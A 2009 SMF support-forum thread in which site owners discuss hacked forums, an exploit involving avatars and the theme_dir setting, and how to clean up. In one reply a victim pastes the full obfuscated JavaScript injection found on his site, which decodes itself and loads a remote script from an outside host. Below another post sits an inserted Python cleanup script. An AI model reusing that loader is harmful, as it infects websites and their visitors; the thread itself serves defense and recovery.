Author Topic: Hacked, script injection  (Read 247693 times)

Offline Agafonov

  • Newbie
  • *
  • Posts: 8
Re: Hacked, script injection
« Reply #160 on: May 14, 2009, 02:29:55 AM »
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simply overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no others are used by your mods, I'm not sure).
This will make sure that there is no hacker's code in your files.
But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

Offline Edvard

  • Semi-Newbie
  • *
  • Posts: 17
Re: Hacked, script injection
« Reply #161 on: May 14, 2009, 03:21:42 AM »
Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it with a clean backup. Somehow, either through the PHP script or via the rootkit.hacktool on my admin PC, the FTP server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin PC is virus and malware free. Then delete your whole forum (make a backup of the infected forum if you wish; I did, so I could put non-infected avatars and attachments, as well as other changes, back online), change the FTP and MySQL server passwords, and upload clean forum software.

And the most important lesson I've learnt is: MAKE BACKUPS! This will be the last time I have to resort to a backup made almost one and a half years ago. I suggest making backups every time you change some of the PHP or HTML files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.

Offline Tiribulus

  • Sophist Member
  • *****
  • Posts: 1,014
  • Gender: Male
    • Tiribulus on Facebook
    • No Other God
Re: Hacked, script injection
« Reply #162 on: May 14, 2009, 12:52:16 PM »
<<< But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

You're not saying that the mere presence of this value is bad, right? Meaning there is a legitimate one that's supposed to be there, correct?
« Last Edit: May 14, 2009, 02:03:22 PM by Tiribulus »

Offline stevefdl

  • Semi-Newbie
  • *
  • Posts: 13
Re: Hacked, script injection
« Reply #163 on: May 14, 2009, 03:19:03 PM »
I got hacked with a JavaScript block between the head and body of my site. I tried re-installing, but nothing seems to work. The code is still there... Anyone know if this is the same hack?

</head><script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
 --></script>
<body>

Offline Filipina

  • Full Member
  • ***
  • Posts: 454
  • Gender: Female
Re: Hacked, script injection
« Reply #164 on: May 15, 2009, 01:17:42 AM »
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simply overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no others are used by your mods, I'm not sure).
This will make sure that there is no hacker's code in your files.
But even then you have to alter the database to clean the special "theme_dir" value from the "smf_themes" table that was used to break in.

OK, thanks for the information. I did a search today of the two main user names being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming", it must be too late for them. My registration will just remain closed until a patch comes out, because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl it and find that mess. It is truly sad.

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,095
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #165 on: May 15, 2009, 01:35:29 AM »
Actually, the statement is slightly incorrect.

Uploading a clean set of files *WILL* help and will solve your immediate problems with the forum. It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline Jorin

  • SMF Hero
  • ******
  • Posts: 2,021
  • Gender: Male
    • ElkArte-Hilfe.de
Re: Hacked, script injection
« Reply #166 on: May 15, 2009, 02:30:10 AM »
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? I don't want any details, just a simple "yes, it should be online soon" or a "no, this cannot be solved on an SMF basis".  ;)

Offline crash56

  • Jr. Member
  • **
  • Posts: 206
  • Test Dummy Extraordinaire
Re: Hacked, script injection
« Reply #167 on: May 15, 2009, 05:43:11 AM »
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? I don't want any details, just a simple "yes, it should be online soon" or a "no, this cannot be solved on an SMF basis".  ;)

They're working on it. Kindred posted that they're working on a fix. It's on page 8 of this thread.

No ETA yet. 

Offline Jorin

  • SMF Hero
  • ******
  • Posts: 2,021
  • Gender: Male
    • ElkArte-Hilfe.de
Re: Hacked, script injection
« Reply #168 on: May 15, 2009, 05:51:24 AM »
Ah, thanks.  :)

Offline Aleksi "Lex" Kilpinen

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,430
  • Gender: Male
  • The Artist Formerly Known as LexArma
Re: Hacked, script injection
« Reply #169 on: May 15, 2009, 06:09:28 AM »
Krisbarteo registered on my forum today,

Code:
krisbarteo - krisbarteo@gmail.com - 94.142.129.147 -  Today at 12:58:32

The "Stop Spammer" mod marked all profile details as spammer and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as the IP,
and I have a gender option on registration, and krisbarteo selected male ;D
« Last Edit: May 15, 2009, 06:28:22 AM by LexArma »
Finnish Support Local Moderator & Support Specialist
My Mods: Facebook and Twitter Sharer

Offline agridoc

  • SMF Hero
  • ******
  • Posts: 3,274
  • Gender: Male
    • Aeromodelling GR - Aeromodelling in Greece
Re: Hacked, script injection
« Reply #170 on: May 15, 2009, 06:54:34 AM »
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded (http://www.motobit.com/util/base64-decoder-encoder.asp).

The longest path in the domain's directory is used and many garbage files are added there. I had to use the SHELL to find and keep this file for examination, as there are file limitations in FTP and the CP file manager. The file can be decoded to see what else could have been done.

If there is no recent backup, each PHP file has to be opened and the injected code deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search for (the injected code).
- Search the domain recursively for PHP files and build an array.
- Use this array to open and search each PHP file and, if the string (the injected code) is found, delete it.

Such a cleaning script would be greatly appreciated, even by supporters.
« Last Edit: May 17, 2009, 09:10:54 AM by agridoc »
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
I don't spend time on messages written in Greeklish.
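The three-step cleaning script agridoc asks for above, written here in Python as an added example (it is not code from the thread or from SMF). It defaults to a dry run that only reports which PHP files contain the injected string, and keeps a copy of each file it rewrites; SAMPLE_INJECTION, the .infected.bak suffix and the directory layout built in demo() are constructed for illustration.

```python
"""Cleaning script of the kind agridoc asks for: strip an injected string from every PHP file."""
import os
import shutil
import tempfile

# Constructed stand-in for the injected block (the thread's real sample is far longer);
# in practice the admin supplies the exact text found in the infected files.
SAMPLE_INJECTION = "<script language=javascript><!--\n(function(){eval('...')})();\n --></script>"

def find_php_files(root):
    """Step 2: walk the tree and collect every .php file (our .bak copies are skipped)."""
    found = []
    for dirpath, _dirs, names in os.walk(root):
        found.extend(os.path.join(dirpath, n) for n in names if n.lower().endswith(".php"))
    return sorted(found)

def clean_file(path, needle, dry_run=True):
    """Step 3: count occurrences of needle in one file; remove them unless dry_run."""
    with open(path, "rb") as fh:
        data = fh.read()
    needle_b = needle.encode("utf-8")
    count = data.count(needle_b)
    if count and not dry_run:
        shutil.copy2(path, path + ".infected.bak")  # keep the original for examination
        with open(path, "wb") as fh:
            fh.write(data.replace(needle_b, b""))
    return count

def clean_tree(root, needle, dry_run=True):
    """Return {path: occurrences} for every PHP file that contained needle."""
    hits = {}
    for path in find_php_files(root):
        n = clean_file(path, needle, dry_run)
        if n:
            hits[path] = n
    return hits

def demo():
    """Build a tiny constructed forum tree, dry-run it, then clean it for real."""
    root = tempfile.mkdtemp(prefix="smfclean_")
    infected = os.path.join(root, "Themes", "default", "index.template.php")
    os.makedirs(os.path.dirname(infected))
    with open(infected, "wb") as fh:
        fh.write(b"</head>" + SAMPLE_INJECTION.encode("utf-8") + b"<body>")
    with open(os.path.join(root, "Settings.php"), "wb") as fh:  # clean file, must be untouched
        fh.write(b"<?php $db_name = 'smf'; ?>")
    dry = clean_tree(root, SAMPLE_INJECTION)                     # report only, nothing written
    applied = clean_tree(root, SAMPLE_INJECTION, dry_run=False)
    with open(infected, "rb") as fh:
        still_there = SAMPLE_INJECTION.encode("utf-8") in fh.read()
    return {"dry": len(dry), "applied": len(applied), "still_there": still_there,
            "backup": os.path.exists(infected + ".infected.bak")}
```

For step 1, read the exact injected text from a file (it is usually multi-line) and pass it as needle; run a dry run first and review the reported list, and remember that this only strips the known string from existing files, so backdoor files the attacker added still have to be found and deleted separately.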

Offline sponna

  • Newbie
  • *
  • Posts: 1
Re: Hacked, script injection
« Reply #171 on: May 15, 2009, 02:32:24 PM »
We got hit slightly differently, it seems. The attacker managed to upload a file "attach.php" in the attachments directory together with the avatar exploit. He then created an .htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code, into which many different versions of drug-selling stores were called. All of these URLs were accessed from the attachments directory in the forum via the redirect in the .htaccess file.

I'm still trying to work out what sequence of events led to the compromise, but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled, so I'm not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of URLs and indexed them; we knew something was wrong when our bandwidth went sky high.

Offline Samker

  • Jr. Member
  • **
  • Posts: 145
  • Gender: Male
  • "Whatever doesn't kill us makes us stronger."
    • SCforum.info - Samker's Computer Forum
Re: Hacked, script injection
« Reply #172 on: May 15, 2009, 04:13:26 PM »
I also found "KrisBarteo" in the member base, but it looks like he didn't succeed in hacking us... At least I don't have anything unusual on my SCForum.

Can somebody please also check (and verify) that everything is OK with the forum??


http://www.SCforum.info


Thanks in Advance!

S.
Samker's Computer Forum - SCforum.info

Offline Sarge

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,209
  • Gender: Male
    • Zëri YT!
Re: Hacked, script injection
« Reply #173 on: May 15, 2009, 04:18:02 PM »
Can somebody please also check (and verify) that everything is OK with the forum??

Your forum looks fine to me.
    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting

Offline Dzonny

  • Lead Localizer
  • SMF Super Hero
  • *
  • Posts: 11,603
  • Gender: Male
  • No sleep...
    • dzontra.nikola on Facebook
    • Dzonny on GitHub
    • dzontranikola on LinkedIn
    • @opusteniforum on Twitter
    • Samo opusteno
Re: Hacked, script injection
« Reply #174 on: May 15, 2009, 04:23:27 PM »
Can somebody please also check (and verify) that everything is OK with the forum??

Your forum looks fine to me.
I agree... ;)

Offline Samker

  • Jr. Member
  • **
  • Posts: 145
  • Gender: Male
  • "Whatever doesn't kill us makes us stronger."
    • SCforum.info - Samker's Computer Forum
Re: Hacked, script injection
« Reply #175 on: May 15, 2009, 04:32:36 PM »
Thank you guys...  :D

I'm now wondering why he didn't succeed with the hack, since he has been registered since 09 May 2009 and I have only known about this "hole" for a few hours??

I have tight settings (normal for a security forum, which I run); maybe I could help others with protection... I mean we could compare settings and find differences between installed mods, enabled features etc.??

Best Regards,

S.

Samker's Computer Forum - SCforum.info

Offline agridoc

  • SMF Hero
  • ******
  • Posts: 3,274
  • Gender: Male
    • Aeromodelling GR - Aeromodelling in Greece
Re: Hacked, script injection
« Reply #176 on: May 15, 2009, 05:06:14 PM »
Can somebody please also check (and verify) that everything is OK with the forum??

It might look OK but be infected. Go in with FTP and check some PHP files. If there is no added code, it's probably not infected. Also check your error log.

Offline Samker

  • Jr. Member
  • **
  • Posts: 145
  • Gender: Male
  • "Whatever doesn't kill us makes us stronger."
    • SCforum.info - Samker's Computer Forum
Re: Hacked, script injection
« Reply #177 on: May 15, 2009, 05:21:46 PM »
Can somebody please also check (and verify) that everything is OK with the forum??

It might look OK but be infected. Go in with FTP and check some PHP files. If there is no added code, it's probably not infected. Also check your error log.

I had already double-checked all the mentioned things and everything seems OK.

Thanks for reply.
Samker's Computer Forum - SCforum.info

Offline M-DVD

  • SMF Hero
  • ******
  • Posts: 1,650
  • Gender: Male
  • Step by step will update the mods to SMF 2RC2
Re: Hacked, script injection
« Reply #178 on: May 15, 2009, 05:53:32 PM »
3.- There is another problem: how do the spammers run this file once it is uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480


THANKS Agafonov, without your info I could never have found the trick  >:(

How the value of theme_dir appeared in the smf_themes table is the main question.

The guy is brilliant. I found the way only because I already knew it exists and searched for it on the site.

I'm now wondering why he didn't succeed with the hack, since he has been registered since 09 May 2009 and I have only known about this "hole" for a few hours??

Perhaps because the guy has been busy :P

Offline Tiribulus

  • Sophist Member
  • *****
  • Posts: 1,014
  • Gender: Male
    • Tiribulus on Facebook
    • No Other God
Re: Hacked, script injection
« Reply #179 on: May 15, 2009, 05:59:07 PM »
<<< I found the way only because I already knew it exists and searched for it on the site. >>>

How would ya like to be a sterling citizen and share that with us? :)